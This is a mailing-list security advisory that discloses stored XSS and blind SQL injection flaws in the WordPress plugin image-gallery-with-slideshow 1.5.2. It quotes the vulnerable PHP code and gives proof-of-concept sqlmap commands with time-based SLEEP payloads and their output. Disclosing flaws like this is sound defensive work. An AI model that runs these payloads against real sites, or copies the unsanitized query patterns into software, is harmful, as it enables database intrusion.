Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 05 Apr 2017 19:00:03 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Blind SQL Injection and persistent XSS in Wordpress plugin
 image-gallery-with-slideshow v1.5.2

Title: Blind SQL Injection and persistent XSS in Wordpress plugin image-gallery-with-slideshow v1.5.2
Author: Larry W. Cashdollar, @_larry0
Date: 2017-04-01
CVE-ID:[CVE-2017-1002011][CVE-2017-1002012][CVE-2017-1002013][CVE-2017-1002014][CVE-2017-1002015]
Download Site: https://wordpress.org/plugins/image-gallery-with-slideshow/
Vendor: http://www.anblik.com/
Vendor Notified: 2017-04-01
Vendor Contact: https://twitter.com/anblik
Advisory: http://www.vapidlabs.com/advisory.php?v=189
Description: Image Gallery with Slideshow is a full integrated Image Gallery and Slideshow plugin for WordPress.
Vulnerability:
CVE-2017-1002011:

There is a stored XSS vulnerability via the $value->gallery_name and $value->gallery_description where anyone with privileges to modify or add galleries / images and inject javascript into the database.

145  <td><a class="row-title" title="Edit" href="<?php echo bloginfo('url');?>/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=<?php echo $value->gallery_id;?>"><?php echo $value->gallery_name;?></a></td>
146  <td>&nbsp;<?php echo $value->gallery_description;?></td>

CVE-2017-1002012:

In image-gallery-with-slideshow/admin_setting.php the following snippet of code does not sanitize input via the gid variable before passing it into an SQL statement:


173 if($_REQUEST['val'] == 'view')
174 {
175         $path_value = get_combo_path_value();
176         $id = $_REQUEST['gid'];
177         global $wpdb;
178         $table_prefix = $wpdb->prefix;
179         $result = $wpdb->get_results("SELECT ig.gallery_name,ii.image_id,ii.original_name,ii.image_name,ii.gallery_id,ii.image_title,ii.link_url,ii.image_description FROM `".$table_prefix."combo_gallery` AS ig,`".$table_prefix."combo_image` AS ii WHERE ig.gallery_   id=ii.gallery_id AND ii.gallery_id =".$id);


255 if($_REQUEST['val'] == 'edit')
256 {
257         $id = $_REQUEST['gid'];
258         global $wpdb;
259         $table_prefix = $wpdb->prefix;
.
.
.
270         $edit_result = $wpdb->get_results("SELECT * FROM `".$table_prefix."combo_gallery` WHERE gallery_id = ".$id);

CVE-2017-1002013:
Blind SQL Injection via imgid parameter.

301 if($_REQUEST['val'] == 'imgedit')
302 {
303         $id = $_REQUEST['imgid'];
304         $gid = $_REQUEST['gid'];
305         global $wpdb;
.
.
309         if(isset($_REQUEST['edit_image_submit']))
310         {
.
.
.
318         $edit_img_result = $wpdb->get_results("SELECT * FROM `".$table_prefix."combo_image` WHERE image_id = ".$id);


361 if($_REQUEST['gval'] == 'delete')
362 {
363         $id = $_REQUEST['gid'];
364         global $wpdb;
365         $table_prefix = $wpdb->prefix;
366         $info = $_SERVER['DOCUMENT_ROOT'];
367         $path_value = get_combo_path_value();
368         $select_img_query_result = $wpdb->get_results("SELECT * FROM `".$table_prefix."combo_image` WHERE gallery_id=".$id);


384 if($_REQUEST['ival'] == 'delete')
385 {
386         $path_value = get_combo_path_value();
387         $id = $_REQUEST['gid'];
388         global $wpdb;
389         $table_prefix = $wpdb->prefix;
390         $info = $_SERVER['DOCUMENT_ROOT'];
391         $select_img_query_result1 = $wpdb->get_results("SELECT * FROM `".$table_prefix."combo_image` WHERE image_id=".$id);

CVE-2017-1002014:
Blind SQL Injection via gallery_name parameter.

422 if(isset($_POST['gallery_submit']))
423 {
424         $gallery_name = $_REQUEST['gallery_name'];
425         $insert_query_result = $wpdb->insert($table_prefix.'combo_gallery', array('gallery_name' => $gallery_name,'date' => current_time('mysql')));
426 

CVE-2017-1002015:
Blind SQL Injection via selectMulGallery parameter.
492 if(isset($_POST['image_submit']))
493 {
494         $gallery_id = $_POST['selectMulGallery'];
495         $update_gallery_query = "UPDATE `".$table_prefix."combo_image` SET gallery_id=".$gallery_id." WHERE gallery_id = '0'";
496         $wpdb->query($update_gallery_query);

Exploit Code:
	• $ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=*' --load-cookies=./cookie.txt --dbms=mysql --risk 2 --level 2
	•  
	•  
	• Parameter: #1* (URI)
	•     Type: AND/OR time-based blind
	•     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
	•     Payload: http://192.168.0.169:80/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=(CASE WHEN (2912=2912) THEN SLEEP(5) ELSE 2912 END)
	• ---
	• [14:28:20] [INFO] the back-end DBMS is MySQL
	• web server operating system: Linux Ubuntu 16.04 (xenial)
	• web application technology: Apache 2.4.18
	• back-end DBMS: MySQL >= 5.0.12
	• [14:28:20] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
	•  
	• [*] shutting down at 14:28:20
	•  
	•  
	• $ sqlmap -u 'http://192.168.0.169/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=imgedit&imgid=*&gid=1' --load-cookies=./cookie.txt --dbms=mysql --risk 2 --level 2
	• sqlmap identified the following injection point(s) with a total of 337 HTTP(s) requests:
	• ---
	• Parameter: #1* (URI)
	•     Type: AND/OR time-based blind
	•     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
	•     Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=imgedit&imgid=(CASE WHEN (4482=4482) THEN SLEEP(5) ELSE 4482 END)&gid=1
	• ---
	• [22:07:00] [INFO] the back-end DBMS is MySQL
	• web server operating system: Linux Ubuntu 16.04 (xenial)
	• web application technology: Apache 2.4.18
	• back-end DBMS: MySQL >= 5.0.12
	• [22:07:00] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ